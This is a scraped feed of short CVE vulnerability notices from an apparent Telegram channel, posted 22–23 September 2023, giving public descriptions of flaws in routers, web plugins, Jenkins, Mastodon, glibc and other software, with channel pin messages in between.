🚨 CVE-2023-4504Due to failure in validating the length provided by an attacker-crafted PPD PostScript document, CUPS and libppd are susceptible to a heap-based buffer overflow and possibly code execution. This issue has been fixed in CUPS version 2.4.7, released in September of 2023.🎖@cveNotify |
|
| 2023-09-23 15:32:21 |
CVE Notify pinned «Guys with premium telegram account, boost please: https://t.me/cveNotify?boost» |
|
| 2023-09-23 15:32:17 |
None |
|
| 2023-09-23 11:07:20 |
🚨 CVE-2023-5134The Easy Registration Forms for WordPress is vulnerable to Information Disclosure via the 'erforms_user_meta' shortcode in versions up to, and including, 2.1.1 due to insufficient controls on the information retrievable via the shortcode. This makes it possible for authenticated attackers, with subscriber-level capabilities or above, to retrieve arbitrary sensitive user meta.🎖@cveNotify |
|
| 2023-09-23 11:07:19 |
🚨 CVE-2023-5125The Contact Form by FormGet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formget' shortcode in versions up to, and including, 5.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-09-23 05:37:45 |
🚨 CVE-2023-43640TaxonWorks is a web-based workbench designed for taxonomists and biodiversity scientists. Prior to version 0.34.0, a SQL injection vulnerability was found in TaxonWorks that allows authenticated attackers to extract arbitrary data from the TaxonWorks database (including the users table). This issue may lead to information disclosure. Version 0.34.0 contains a fix for the issue.🎖@cveNotify |
|
| 2023-09-23 05:37:44 |
🚨 CVE-2023-38346An issue was discovered in Wind River VxWorks 6.9 and 7. The function ``tarExtract`` implements TAR file extraction and thereby also processes files within an archive that have relative or absolute file paths. A developer using the "tarExtract" function may expect that the function will strip leading slashes from absolute paths or stop processing when encountering relative paths that are outside of the extraction path, unless otherwise forced. This could lead to unexpected and undocumented behavior, which in general could result in a directory traversal, and associated unexpected behavior.🎖@cveNotify |
|
| 2023-09-23 05:37:43 |
🚨 CVE-2023-43270dst-admin v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the userId parameter at /home/playerOperate.🎖@cveNotify |
|
| 2023-09-23 05:37:42 |
🚨 CVE-2023-41027Credential disclosure in the '/webs/userpasswd.htm' endpoint in Juplink RX4-1500 Wifi router firmware versions V1.0.4 and V1.0.5 allows an authenticated attacker to leak the password for the administrative account via requests to the vulnerable endpoint.🎖@cveNotify |
|
| 2023-09-23 05:37:41 |
🚨 CVE-2023-41029Command injection vulnerability in the homemng.htm endpoint in Juplink RX4-1500 Wifi router firmware versions V1.0.2, V1.0.3, V1.0.4, and V1.0.5 allows authenticated remote attackers to execute commands as root via specially crafted HTTP requests to the vulnerable endpoint.🎖@cveNotify |
|
| 2023-09-23 05:37:37 |
🚨 CVE-2023-41031Command injection in homemng.htm in Juplink RX4-1500 versions V1.0.2, V1.0.3, V1.0.4, and V1.0.5 allows remote authenticated attackers to execute commands via specially crafted requests to the vulnerable endpoint.🎖@cveNotify |
|
| 2023-09-23 05:37:36 |
🚨 CVE-2023-42812Galaxy is an open-source platform for FAIR data analysis. Prior to version 22.05, Galaxy is vulnerable to server-side request forgery, which allows a malicious to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses. Version 22.05 contains a patch for this issue.🎖@cveNotify |
|
| 2023-09-23 05:37:35 |
🚨 CVE-2023-42821The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.🎖@cveNotify |
|
| 2023-09-23 05:37:34 |
🚨 CVE-2023-43495Jenkins 2.423 and earlier, LTS 2.414.1 and earlier does not escape the value of the 'caption' constructor parameter of 'ExpandableDetailsNote', resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control this parameter.🎖@cveNotify |
|
| 2023-09-23 05:37:33 |
🚨 CVE-2023-43496Jenkins 2.423 and earlier, LTS 2.414.1 and earlier creates a temporary file in the system temporary directory with the default permissions for newly created files when installing a plugin from a URL, potentially allowing attackers with access to the system temporary directory to replace the file before it is installed in Jenkins, potentially resulting in arbitrary code execution.🎖@cveNotify |
|
| 2023-09-23 05:37:29 |
🚨 CVE-2023-43497In Jenkins 2.423 and earlier, LTS 2.414.1 and earlier, processing file uploads using the Stapler web framework creates temporary files in the default system temporary directory with the default permissions for newly created files, potentially allowing attackers with access to the Jenkins controller file system to read and write the files before they are used.🎖@cveNotify |
|
| 2023-09-23 05:37:28 |
🚨 CVE-2023-39252Dell SCG Policy Manager 5.16.00.14 contains a broken cryptographic algorithm vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability by performing MitM attacks and let attackers obtain sensitive information.🎖@cveNotify |
|
| 2023-09-23 05:37:27 |
🚨 CVE-2018-5478Contao 3.x before 3.5.32 allows XSS via the unsubscribe module in the frontend newsletter extension.🎖@cveNotify |
|
| 2023-09-23 05:37:26 |
🚨 CVE-2023-42322Insecure Permissions vulnerability in icmsdev iCMS v.7.0.16 allows a remote attacker to obtain sensitive information.🎖@cveNotify |
|
| 2023-09-23 05:37:22 |
🚨 CVE-2023-4152Frauscher Sensortechnik GmbH FDS101 for FAdC/FAdCi v1.4.24 and all previous versions are vulnerable to a path traversal vulnerability of the web interface by a crafted URL without authentication. This enables an remote attacker to read all files on the filesystem of the FDS101 device.🎖@cveNotify |
|
| 2023-09-23 05:37:21 |
🚨 CVE-2023-42810systeminformation is a System Information Library for Node.JS. Versions 5.0.0 through 5.21.6 have a SSID Command Injection Vulnerability. The problem was fixed with a parameter check in version 5.21.7. As a workaround, check or sanitize parameter strings that are passed to `wifiConnections()`, `wifiNetworks()` (string only).🎖@cveNotify |
|
| 2023-09-23 05:37:20 |
🚨 CVE-2023-34577SQL injection vulnerability in Prestashop opartplannedpopup 1.4.11 and earlier allows remote attackers to run arbitrary SQL commands via OpartPlannedPopupModuleFrontController::prepareHook() method.🎖@cveNotify |
|
| 2023-09-23 05:37:19 |
🚨 CVE-2023-34576SQL injection vulnerability in updatepos.php in PrestaShop opartfaq through 1.0.3 allows remote attackers to run arbitrary SQL commands via unspedified vector.🎖@cveNotify |
|
| 2023-09-23 05:37:18 |
🚨 CVE-2023-42482Samsung Mobile Processor Exynos 2200 allows a GPU Use After Free.🎖@cveNotify |
|
| 2023-09-23 02:37:07 |
CVE Notify pinned «Guys with premium telegram account, boost please: https://t.me/cveNotify?boost» |
|
| 2023-09-23 02:37:02 |
None |
|
| 2023-09-23 01:07:30 |
🚨 CVE-2023-41616A reflected cross-site scripting (XSS) vulnerability in the Search Student function of Student Management System v1.2.3 and before allows attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload.🎖@cveNotify |
|
| 2023-09-23 01:07:28 |
🚨 CVE-2023-41614A stored cross-site scripting (XSS) vulnerability in the Add Animal Details function of Zoo Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description of Animal parameter.🎖@cveNotify |
|
| 2023-09-23 01:07:27 |
🚨 CVE-2023-5016A vulnerability was found in spider-flow up to 0.5.0. It has been declared as critical. Affected by this vulnerability is the function DriverManager.getConnection of the file src/main/java/org/spiderflow/controller/DataSourceController.java of the component API. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-239857 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-23 01:07:26 |
🚨 CVE-2023-43129D-LINK DIR-806 1200M11AC wireless router DIR806A1_FW100CNb11 is vulnerable to command injection due to lax filtering of REMOTE_PORT parameters.🎖@cveNotify |
|
| 2023-09-23 01:07:25 |
🚨 CVE-2023-43130D-LINK DIR-806 1200M11AC wireless router DIR806A1_FW100CNb11 is vulnerable to command injection.🎖@cveNotify |
|
| 2023-09-23 01:07:24 |
🚨 CVE-2023-0462An arbitrary code execution flaw was found in Foreman. This issue may allow an admin user to execute arbitrary code on the underlying operating system by setting global parameters with a YAML payload.🎖@cveNotify |
|
| 2023-09-23 01:07:23 |
🚨 CVE-2023-0118An arbitrary code execution flaw was found in Foreman. This flaw allows an admin user to bypass safe mode in templates and execute arbitrary code on the underlying operating system.🎖@cveNotify |
|
| 2023-09-23 01:07:22 |
🚨 CVE-2023-39045An information leak in kokoroe_members card Line 13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-23 01:07:21 |
🚨 CVE-2023-39052An information leak in Earthgarden_waiting 13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-23 01:07:20 |
🚨 CVE-2023-38875A reflected cross-site scripting (XSS) vulnerability in msaad1999's PHP-Login-System 2.0.1 allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the 'validator' parameter in '/reset-password'.🎖@cveNotify |
|
| 2023-09-23 01:07:19 |
🚨 CVE-2015-5467web\ViewAction in Yii (aka Yii2) 2.x before 2.0.5 allows attackers to execute any local .php file via a relative path in the view parameeter.🎖@cveNotify |
|
| 2023-09-23 01:07:18 |
🚨 CVE-2023-39041An information leak in KUKURUDELI Line v13.6.1 allows attackers to obtain the channel access token and send crafted messages.🎖@cveNotify |
|
| 2023-09-23 01:07:17 |
🚨 CVE-2023-37410IBM Personal Communications 14.05, 14.06, and 15.0.0 could allow a local user to escalate their privileges to the SYSTEM user due to overly permissive access controls. IBM X-Force ID: 260138.🎖@cveNotify |
|
| 2023-09-23 01:07:16 |
🚨 CVE-2023-20597Improper initialization of variables in the DXE driver may allow a privileged user to leak sensitive information via local access.🎖@cveNotify |
|
| 2023-09-22 22:37:16 |
🚨 CVE-2023-3817Issue summary: Checking excessively long DH keys or parameters may be very slow.Impact summary: Applications that use the functions DH_check(), DH_check_ex()or EVP_PKEY_param_check() to check a DH key or DH parameters may experience longdelays. Where the key or parameters that are being checked have been obtainedfrom an untrusted source this may lead to a Denial of Service.The function DH_check() performs various checks on DH parameters. After fixingCVE-2023-3446 it was discovered that a large q parameter value can also triggeran overly long computation during some of these checks. A correct q value,if present, cannot be larger than the modulus p parameter, thus it isunnecessary to perform these checks if q is larger than p.An application that calls DH_check() and supplies a key or parameters obtainedfrom an untrusted source could be vulnerable to a Denial of Service attack.The function DH_check() is itself called by a number of other OpenSSL functions.An application calling any of those other functions may similarly be affected.The other functions affected by this are DH_check_ex() andEVP_PKEY_param_check().Also vulnerable are the OpenSSL dhparam and pkeyparam command line applicationswhen using the "-check" option.The OpenSSL SSL/TLS implementation is not affected by this issue.The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.🎖@cveNotify |
|
| 2023-09-22 22:37:15 |
🚨 CVE-2023-38408The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.🎖@cveNotify |
|
| 2023-09-22 22:37:14 |
🚨 CVE-2023-40989SQL injection vulnerbility in jeecgboot jeecg-boot v 3.0, 3.5.3 that allows a remote attacker to execute arbitrary code via a crafted request to the report/jeecgboot/jmreport/queryFieldBySql component.🎖@cveNotify |
|
| 2023-09-22 20:37:17 |
🚨 CVE-2023-4236A flaw in the networking code handling DNS-over-TLS queries may cause `named` to terminate unexpectedly due to an assertion failure. This happens when internal data structures are incorrectly reused under significant DNS-over-TLS query load.This issue affects BIND 9 versions 9.18.0 through 9.18.18 and 9.18.11-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2023-09-22 20:37:16 |
🚨 CVE-2022-3916A flaw was found in the offline_access scope in Keycloak. This issue would affect users of shared computers more (especially if cookies are not cleared), due to a lack of root session validation, and the reuse of session ids across root and user authentication sessions. This enables an attacker to resolve a user session attached to a previously authenticated user; when utilizing the refresh token, they will be issued a token for the original user.🎖@cveNotify |
|
| 2023-09-22 20:37:15 |
🚨 CVE-2023-2508The `PaperCutNG Mobility Print` version 1.0.3512 application allows anunauthenticated attacker to perform a CSRF attack on an instanceadministrator to configure the clients host (in the "configure printerdiscovery" section). This is possible because the application has noprotections against CSRF attacks, like Anti-CSRF tokens, header originvalidation, samesite cookies, etc.🎖@cveNotify |
|
| 2023-09-22 20:37:14 |
🚨 CVE-2023-40043In Progress MOVEit Transfer versions released before 2021.1.8 (13.1.8), 2022.0.8 (14.0.8), 2022.1.9 (14.1.9), 2023.0.6 (15.0.6), a SQL injection vulnerability has been identified in the MOVEit Transfer web interface that could allow a MOVEit system administrator account to gain unauthorized access to the MOVEit Transfer database. A MOVEit system administrator could submit a crafted payload to the MOVEit Transfer web interface which could result in modification and disclosure of MOVEit database content.🎖@cveNotify |
|
| 2023-09-22 18:49:17 |
CVE Notify pinned «Guys with premium telegram account, boost please: https://t.me/cveNotify?boost» |
|
| 2023-09-22 18:49:12 |
None |
|
| 2023-09-22 18:37:36 |
🚨 CVE-2023-41029Command injection vulnerability in the homemng.htm endpoint in Juplink RX4-1500 Wifi router firmware versions V1.0.2, V1.0.3, V1.0.4, and V1.0.5 allows authenticated remote attackers to execute commands as root via specially crafted HTTP requests to the vulnerable endpoint.🎖@cveNotify |
|
| 2023-09-22 18:37:34 |
🚨 CVE-2023-41031Command injection in homemng.htm in Juplink RX4-1500 versions V1.0.2, V1.0.3, V1.0.4, and V1.0.5 allows remote authenticated attackers to execute commands via specially crafted requests to the vulnerable endpoint.🎖@cveNotify |
|
| 2023-09-22 18:37:33 |
🚨 CVE-2023-42812Galaxy is an open-source platform for FAIR data analysis. Prior to version 22.05, Galaxy is vulnerable to server-side request forgery, which allows a malicious to issue arbitrary HTTP/HTTPS requests from the application server to internal hosts and read their responses. Version 22.05 contains a patch for this issue.🎖@cveNotify |
|
| 2023-09-22 18:37:32 |
🚨 CVE-2023-42821The package `github.com/gomarkdown/markdown` is a Go library for parsing Markdown text and rendering as HTML. Prior to pseudoversion `0.0.0-20230922105210-14b16010c2ee`, which corresponds with commit `14b16010c2ee7ff33a940a541d993bd043a88940`, parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability. To exploit the vulnerability, parser needs to have `parser.Mmark` extension set. The panic occurs inside the `citation.go` file on the line 69 when the parser tries to access the element past its length. This can result in a denial of service. Commit `14b16010c2ee7ff33a940a541d993bd043a88940`/pseudoversion `0.0.0-20230922105210-14b16010c2ee` contains a patch for this issue.🎖@cveNotify |
|
| 2023-09-22 18:37:31 |
🚨 CVE-2023-25528NVIDIA DGX H100 baseboard management controller (BMC) contains a vulnerability in a web server plugin, where an unauthenticated attacker may cause a stack overflow by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-09-22 18:37:29 |
🚨 CVE-2023-41030Hard-coded credentials in Juplink RX4-1500 versions V1.0.2 through V1.0.5 allow unauthenticated attackers to log in to the web interface or telnet service as the 'user' user.🎖@cveNotify |
|
| 2023-09-22 18:37:28 |
🚨 CVE-2023-25527NVIDIA DGX H100 BMC contains a vulnerability in the host KVM daemon, where an authenticated local attacker may cause corruption of kernel memory. A successful exploit of this vulnerability may lead to arbitrary kernel code execution, denial of service, escalation of privileges, information disclosure, and data tampering.🎖@cveNotify |
|
| 2023-09-22 18:37:27 |
🚨 CVE-2023-42452Mastodon is a free, open-source social network server based on ActivityPub. In versions on the 4.x branch prior to versions 4.0.10, 4.2.8, and 4.2.0-rc2, under certain conditions, attackers can abuse the translation feature to bypass the server-side HTML sanitization, allowing unescaped HTML to execute in the browser. The impact is limited thanks to Mastodon's strict Content Security Policy, blocking inline scripts, etc. However a CSP bypass or loophole could be exploited to execute malicious XSS. Furthermore, it requires user interaction, as this can only occur upon clicking the “Translate” button on a malicious post. Versions 4.0.10, 4.2.8, and 4.2.0-rc2 contain a patch for this issue.🎖@cveNotify |
|
| 2023-09-22 18:37:26 |
🚨 CVE-2023-42451Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 3.5.14, 4.0.10, 4.1.8, and 4.2.0-rc2, under certain circumstances, attackers can exploit a flaw in domain name normalization to spoof domains they do not own. Versions 3.5.14, 4.0.10, 4.1.8, and 4.2.0-rc2 contain a patch for this issue.🎖@cveNotify |
|
| 2023-09-22 18:37:25 |
🚨 CVE-2023-42450Mastodon is a free, open-source social network server based on ActivityPub. Starting in version 4.2.0-beta1 and prior to version 4.2.0-rc2, by crafting specific input, attackers can inject arbitrary data into HTTP requests issued by Mastodon. This can be used to perform confused deputy attacks if the server configuration includes `ALLOWED_PRIVATE_ADDRESSES` to allow access to local exploitable services. Version 4.2.0-rc2 has a patch for the issue.🎖@cveNotify |
|
| 2023-09-22 18:37:24 |
🚨 CVE-2016-1238(1) cpan/Archive-Tar/bin/ptar, (2) cpan/Archive-Tar/bin/ptardiff, (3) cpan/Archive-Tar/bin/ptargrep, (4) cpan/CPAN/scripts/cpan, (5) cpan/Digest-SHA/shasum, (6) cpan/Encode/bin/enc2xs, (7) cpan/Encode/bin/encguess, (8) cpan/Encode/bin/piconv, (9) cpan/Encode/bin/ucmlint, (10) cpan/Encode/bin/unidump, (11) cpan/ExtUtils-MakeMaker/bin/instmodsh, (12) cpan/IO-Compress/bin/zipdetails, (13) cpan/JSON-PP/bin/json_pp, (14) cpan/Test-Harness/bin/prove, (15) dist/ExtUtils-ParseXS/lib/ExtUtils/xsubpp, (16) dist/Module-CoreList/corelist, (17) ext/Pod-Html/bin/pod2html, (18) utils/c2ph.PL, (19) utils/h2ph.PL, (20) utils/h2xs.PL, (21) utils/libnetcfg.PL, (22) utils/perlbug.PL, (23) utils/perldoc.PL, (24) utils/perlivp.PL, and (25) utils/splain.PL in Perl 5.x before 5.22.3-RC2 and 5.24 before 5.24.1-RC2 do not properly remove . (period) characters from the end of the includes directory array, which might allow local users to gain privileges via a Trojan horse module under the current working directory.🎖@cveNotify |
|
| 2023-09-22 18:37:23 |
🚨 CVE-2023-0829Plesk 17.0 through 18.0.31 version, is vulnerable to a Cross-Site Scripting. A malicious subscription owner (either a customer or an additional user), can fully compromise the server if an administrator visits a certain page in Plesk related to the malicious subscription.🎖@cveNotify |
|
| 2023-09-22 18:37:22 |
🚨 CVE-2023-38355MiniTool Movie Maker 6.1.0 contains an insecure installation process that allows attackers to achieve remote code execution through a man in the middle attack.🎖@cveNotify |
|
| 2023-09-22 18:37:21 |
🚨 CVE-2023-38356MiniTool Power Data Recovery 11.6 contains an insecure installation process that allows attackers to achieve remote code execution through a man in the middle attack.🎖@cveNotify |
|
| 2023-09-22 18:37:20 |
🚨 CVE-2023-38354MiniTool Movie Maker 4.1 contains an insecure installation process that allows attackers to achieve remote code execution through a man in the middle attack.🎖@cveNotify |
|
| 2023-09-22 18:37:18 |
🚨 CVE-2023-38353MiniTool Power Data Recovery 11.5 contains an insecure in-app payment system that allows attackers to steal highly sensitive information through a man in the middle attack.🎖@cveNotify |
|
| 2023-09-22 18:37:17 |
🚨 CVE-2023-42798AutomataCI is a template git repository equipped with a native built-in semi-autonomous CI tools. An issue in versions 1.4.1 and below can let a release job reset the git root repository to the first commit. Version 1.5.0 has a patch for this issue. As a workaround, make sure the `PROJECT_PATH_RELEASE` (e.g. `releases/`) directory is manually and actually `git cloned` properly, making it a different git repostiory from the root git repository.🎖@cveNotify |
|
| 2023-09-22 18:37:16 |
🚨 CVE-2022-3874A command injection flaw was found in foreman. This flaw allows an authenticated user with admin privileges on the foreman instance to transpile commands through CoreOS and Fedora CoreOS configurations in templates, possibly resulting in arbitrary command execution on the underlying operating system.🎖@cveNotify |
|
| 2023-09-22 18:37:15 |
🚨 CVE-2023-34319The fix for XSA-423 added logic to Linux'es netback driver to deal witha frontend splitting a packet in a way such that not all of the headerswould come in one piece. Unfortunately the logic introduced theredidn't account for the extreme case of the entire packet being splitinto as many pieces as permitted by the protocol, yet still beingsmaller than the area that's specially dealt with to keep all (possible)headers together. Such an unusual packet would therefore trigger abuffer overrun in the driver.🎖@cveNotify |
|
| 2023-09-22 18:37:14 |
🚨 CVE-2023-5002A flaw was found in pgAdmin. This issue occurs when the pgAdmin server HTTP API validates the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. Versions of pgAdmin prior to 7.6 failed to properly control the server code executed on this API, allowing an authenticated user to run arbitrary commands on the server.🎖@cveNotify |
|
| 2023-09-22 17:07:51 |
🚨 CVE-2023-4951A cross site scripting issue was discovered with the pagination function on the "Client-based Authentication Policy Configuration" screen of the GreenRADIUS web admin interface. This issue is found in GreenRADIUS v5.1.1.1 and prior. A fix was included in v5.1.2.2.🎖@cveNotify |
|
| 2023-09-22 17:07:50 |
🚨 CVE-2023-4863Heap buffer overflow in WebP in Google Chrome prior to 116.0.5845.187 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-09-22 17:07:48 |
🚨 CVE-2022-47557** UNSUPPPORTED WHEN ASSIGNED ** Vulnerability in ekorCCP and ekorRCI that could allow an attacker with access to the network where the device is located to decrypt the credentials of privileged users, and subsequently gain access to the system to perform malicious actions.🎖@cveNotify |
|
| 2023-09-22 17:07:47 |
🚨 CVE-2022-47558** UNSUPPPORTED WHEN ASSIGNED ** Devices ekorCCP and ekorRCI are vulnerable due to access to the FTP service using default credentials. Exploitation of this vulnerability can allow an attacker to modify critical files that could allow the creation of new users, delete or modify existing users, modify configuration files, install rootkits or backdoors.🎖@cveNotify |
|
| 2023-09-22 17:07:46 |
🚨 CVE-2023-41179A vulnerability in the 3rd party AV uninstaller module contained in Trend Micro Apex One (on-prem and SaaS), Worry-Free Business Security and Worry-Free Business Security Services could allow an attacker to manipulate the module to execute arbitrary commands on an affected installation.Note that an attacker must first obtain administrative console access on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-09-22 17:07:44 |
🚨 CVE-2023-41890Sustainsys.Saml2 library adds SAML2P support to ASP.NET web sites, allowing the web site to act as a SAML2 Service Provider. Prior to versions 1.0.3 and 2.9.2, when a response is processed, the issuer of the Identity Provider is not sufficiently validated. This could allow a malicious identity provider to craft a Saml2 response that is processed as if issued by another identity provider. It is also possible for a malicious end user to cause stored state intended for one identity provider to be used when processing the response from another provider. An application is impacted if they rely on any of these features in their authentication/authorization logic: the issuer of the generated identity and claims; or items in the stored request state (AuthenticationProperties). This issue is patched in versions 2.9.2 and 1.0.3. The `AcsCommandResultCreated` notification can be used to add the validation required if an upgrade to patched packages is not possible.🎖@cveNotify |
|
| 2023-09-22 17:07:43 |
🚨 CVE-2023-41387A SQL injection in the flutter_downloader component through 1.11.1 for iOS allows remote attackers to steal session tokens and overwrite arbitrary files inside the app's container. The internal database of the framework is exposed to the local user if an app uses UIFileSharingEnabled and LSSupportsOpeningDocumentsInPlace properties. As a result, local users can obtain the same attack primitives as remote attackers by tampering with the internal database of the framework on the device.🎖@cveNotify |
|
| 2023-09-22 17:07:42 |
🚨 CVE-2023-38255** UNSUPPPORTED WHEN ASSIGNED ** A potential attacker with or without (cookie theft) access to the device would be able to include malicious code (XSS) when uploading new device configuration that could affect the intended function of the device.🎖@cveNotify |
|
| 2023-09-22 17:07:41 |
🚨 CVE-2023-41965** UNSUPPPORTED WHEN ASSIGNED ** Sending some requests in the web application of the vulnerable device allows information to be obtained due to the lack of security in the authentication process.🎖@cveNotify |
|
| 2023-09-22 17:07:39 |
🚨 CVE-2023-42443Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine (EVM). In version 0.3.9 and prior, under certain conditions, the memory used by the builtins `raw_call`, `create_from_blueprint` and `create_copy_of` can be corrupted. For `raw_call`, the argument buffer of the call can be corrupted, leading to incorrect `calldata` in the sub-context. For `create_from_blueprint` and `create_copy_of`, the buffer for the to-be-deployed bytecode can be corrupted, leading to deploying incorrect bytecode.Each builtin has conditions that must be fulfilled for the corruption to happen. For `raw_call`, the `data` argument of the builtin must be `msg.data` and the `value` or `gas` passed to the builtin must be some complex expression that results in writing to the memory. For `create_copy_of`, the `value` or `salt` passed to the builtin must be some complex expression that results in writing to the memory. For `create_from_blueprint`, either no constructor parameters should be passed to the builtin or `raw_args` should be set to True, and the `value` or `salt` passed to the builtin must be some complex expression that results in writing to the memory.As of time of publication, no patched version exists. The issue is still being investigated, and there might be other cases where the corruption might happen. When the builtin is being called from an `internal` function `F`, the issue is not present provided that the function calling `F` wrote to memory before calling `F`. As a workaround, the complex expressions that are being passed as kwargs to the builtin should be cached in memory prior to the call to the builtin.🎖@cveNotify |
|
| 2023-09-22 17:07:35 |
🚨 CVE-2023-25526NVIDIA Cumulus Linux contains a vulnerability in neighmgrd and nlmanager where an attacker on an adjacent network may cause an uncaught exception by injecting a crafted packet. A successful exploit may lead to denial of service.🎖@cveNotify |
|
| 2023-09-22 17:07:34 |
🚨 CVE-2023-42446Pow is a authentication and user management solution for Phoenix and Plug-based apps. Starting in version 1.0.14 and prior to version 1.0.34, use of `Pow.Store.Backend.MnesiaCache` is susceptible to session hijacking as expired keys are not being invalidated correctly on startup. A session may expire when all `Pow.Store.Backend.MnesiaCache` instances have been shut down for a period that is longer than a session's remaining TTL. Version 1.0.34 contains a patch for this issue. As a workaround, expired keys, including all expired sessions, can be manually invalidated.🎖@cveNotify |
|
| 2023-09-22 17:07:33 |
🚨 CVE-2022-3874A command injection flaw was found in foreman. This flaw allows an authenticated user with admin privileges on the foreman instance to transpile commands through CoreOS and Fedora CoreOS configurations in templates, possibly resulting in arbitrary command execution on the underlying operating system.🎖@cveNotify |
|
| 2023-09-22 17:07:32 |
🚨 CVE-2023-5002A flaw was found in pgAdmin. This issue occurs when the pgAdmin server HTTP API validates the path a user selects to external PostgreSQL utilities such as pg_dump and pg_restore. Versions of pgAdmin prior to 7.6 failed to properly control the server code executed on this API, allowing an authenticated user to run arbitrary commands on the server.🎖@cveNotify |
|
| 2023-09-22 17:07:27 |
🚨 CVE-2023-26144Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.**Note:** It was not proven that this vulnerability can crash the process.🎖@cveNotify |
|
| 2023-09-22 17:07:25 |
🚨 CVE-2023-43206D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function web_cert_download_handler. This vulnerability allows attackers to execute arbitrary commands via the certDownload parameter.🎖@cveNotify |
|
| 2023-09-22 17:07:24 |
🚨 CVE-2023-43207D-LINK DWL-6610 FW_v_4.3.0.8B003C was discovered to contain a command injection vulnerability in the function config_upload_handler. This vulnerability allows attackers to execute arbitrary commands via the configRestore parameter.🎖@cveNotify |
|
| 2023-09-22 15:07:49 |
🚨 CVE-2023-4753OpenHarmony v3.2.1 and prior version has a liteos-a kernel may crash caused by mqueue undetected entries vulnerability. Local attackers can crash liteos-a kernel by the error input 🎖@cveNotify |
|
| 2023-09-22 15:07:47 |
🚨 CVE-2022-3637A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function jlink_init of the file monitor/jlink.c of the component BlueZ. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211936.🎖@cveNotify |
|
| 2023-09-22 15:07:46 |
🚨 CVE-2022-3563A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function read_50_controller_cap_complete of the file tools/mgmt-tester.c of the component BlueZ. The manipulation of the argument cap_len leads to null pointer dereference. It is recommended to apply a patch to fix this issue. VDB-211086 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-09-22 15:07:45 |
🚨 CVE-2023-4292Frauscher Sensortechnik GmbH FDS101 for FAdC/FAdCi v1.4.24 and all previous versions are vulnerable to a SQL injection vulnerability via manipulated parameters of the web interface without authentication. The database contains limited, non-critical log information.🎖@cveNotify |
|
| 2023-09-22 15:07:44 |
🚨 CVE-2023-5104Improper Input Validation in GitHub repository nocodb/nocodb prior to 0.96.0.🎖@cveNotify |
|
| 2023-09-22 15:07:43 |
🚨 CVE-2023-4291Frauscher Sensortechnik GmbH FDS101 for FAdC/FAdCi v1.4.24 and all previous versions are vulnerable to a remote code execution (RCE) vulnerability via manipulated parameters of the web interface without authentication. This could lead to a full compromise of the FDS101 device.🎖@cveNotify |
|
| 2023-09-22 15:07:42 |
🚨 CVE-2023-25525NVIDIA Cumulus Linux contains a vulnerability in forwarding where a VxLAN-encapsulated IPv6 packet received on an SVI interface with DMAC/DIPv6 set to the link-local address of the SVI interface may be incorrectly forwarded. A successful exploit may lead to information disclosure.🎖@cveNotify |
|
| 2023-09-22 15:07:41 |
🚨 CVE-2023-4806A flaw was found in glibc. In an extremely rare situation, the getaddrinfo function may access memory that has been freed, resulting in an application crash. This issue is only exploitable when a NSS module implements only the _nss_*_gethostbyname2_r and _nss_*_getcanonname_r hooks without implementing the _nss_*_gethostbyname3_r hook. The resolved name should return a large number of IPv6 and IPv4, and the call to the getaddrinfo function should have the AF_INET6 address family with AI_CANONNAME, AI_ALL and AI_V4MAPPED as flags.🎖@cveNotify |
|
| 2023-09-22 15:07:37 |
🚨 CVE-2023-43090A vulnerability was found in GNOME Shell. GNOME Shell's lock screen allows an unauthenticated local user to view windows of the locked desktop session by using keyboard shortcuts to unlock the restricted functionality of the screenshot tool.🎖@cveNotify |
|
| 2023-09-22 15:07:36 |
